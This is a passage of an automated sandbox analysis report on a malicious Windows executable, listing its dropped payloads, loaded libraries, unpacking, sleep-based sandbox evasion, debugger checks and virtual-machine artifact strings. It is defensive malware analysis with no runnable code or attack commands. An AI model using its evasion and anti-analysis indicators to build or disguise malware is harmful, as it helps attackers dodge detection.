                Source: C:\Users\user\Desktop\AZCFTWko2q.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5868
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeFile created: C:\Users\user\AppData\Local\Temp\86DC.tmpJump to behavior
                Source: AZCFTWko2q.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: AZCFTWko2q.exeVirustotal: Detection: 56%
                Source: AZCFTWko2q.exeReversingLabs: Detection: 55%
                Source: unknownProcess created: C:\Users\user\Desktop\AZCFTWko2q.exe "C:\Users\user\Desktop\AZCFTWko2q.exe"
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeProcess created: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe "C:\Users\user\AppData\Local\Temp\86DC.tmp.exe"
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 1708
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeProcess created: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe "C:\Users\user\AppData\Local\Temp\86DC.tmp.exe" Jump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeUnpacked PE file: 3.2.86DC.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeUnpacked PE file: 0.2.AZCFTWko2q.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeUnpacked PE file: 3.2.86DC.tmp.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00A3F1E2 pushad ; ret 0_2_00A3F1FE
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00A3F360 push ecx; ret 0_2_00A3F37D
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00A3C734 pushad ; ret 0_2_00A3C75C
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00A3CBD5 push 00000003h; ret 0_2_00A3CBD9
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00A3AE2A push es; iretd 0_2_00A3AE3B
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024D09CD push ecx; ret 0_2_024D09E0
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024F799F push esp; retf 0_2_024F79A7
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024DCE18 push ss; retf 0_2_024DCE1D
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024CFFF3 push ecx; ret 0_2_024D0006
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024F7F9D push esp; retf 0_2_024F7F9E
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024FDDDE push dword ptr [esp+ecx-75h]; iretd 0_2_024FDDE2
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024F9DE8 pushad ; retf 0_2_024F9DEF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0041ACF6 push esp; iretd 3_2_0041ACFF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043F6EE push esp; iretd 3_2_0043F6EF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043BF00 push eax; mov dword ptr [esp], 49484716h3_2_0043BF01
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_008DBCF5 pushad ; ret 3_2_008DBCFA
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_008DBF7B push ebp; ret 3_2_008DBF80
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024DC167 push eax; mov dword ptr [esp], 49484716h3_2_024DC168
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024DF555 push esp; iretd 3_2_024DF556
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024BAF5D push esp; iretd 3_2_024BAF66
                Source: AZCFTWko2q.exeStatic PE information: section name: .text entropy: 7.54486526059017
                Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.371146835595198
                Source: 86DC.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.371146835595198
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeJump to dropped file
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeFile created: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeJump to dropped file
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeWindow / User API: threadDelayed 506Jump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeWindow / User API: threadDelayed 9483Jump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65669
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeAPI coverage: 5.1 %
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe TID: 2636Thread sleep count: 506 > 30Jump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe TID: 2636Thread sleep time: -365332s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe TID: 2636Thread sleep count: 9483 > 30Jump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exe TID: 2636Thread sleep time: -6846726s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exe TID: 1240Thread sleep time: -90000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024F8C59 FindFirstFileExW,0_2_024F8C59
                Source: Amcache.hve.7.drBinary or memory string: VMware
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000A76000.00000004.00000020.00020000.00000000.sdmp, AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000ACA000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640135258.0000000000959000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1595828887.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760231719.000000000095C000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640001694.0000000000958000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000003.1640253542.000000000095A000.00000004.00000020.00020000.00000000.sdmp, 86DC.tmp.exe, 00000003.00000002.1760118163.0000000000917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: AZCFTWko2q.exe, 00000000.00000002.3895670011.0000000000ACA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#
                Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_0043A9B0 LdrInitializeThunk,3_2_0043A9B0
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_00A398BB push dword ptr fs:[00000030h]0_2_00A398BB
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024F00C6 mov eax, dword ptr fs:[00000030h]0_2_024F00C6
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024C092B mov eax, dword ptr fs:[00000030h]0_2_024C092B
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024C0D90 mov eax, dword ptr fs:[00000030h]0_2_024C0D90
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_008D8B83 push dword ptr fs:[00000030h]3_2_008D8B83
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A092B mov eax, dword ptr fs:[00000030h]3_2_024A092B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 3_2_024A0D90 mov eax, dword ptr fs:[00000030h]3_2_024A0D90
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
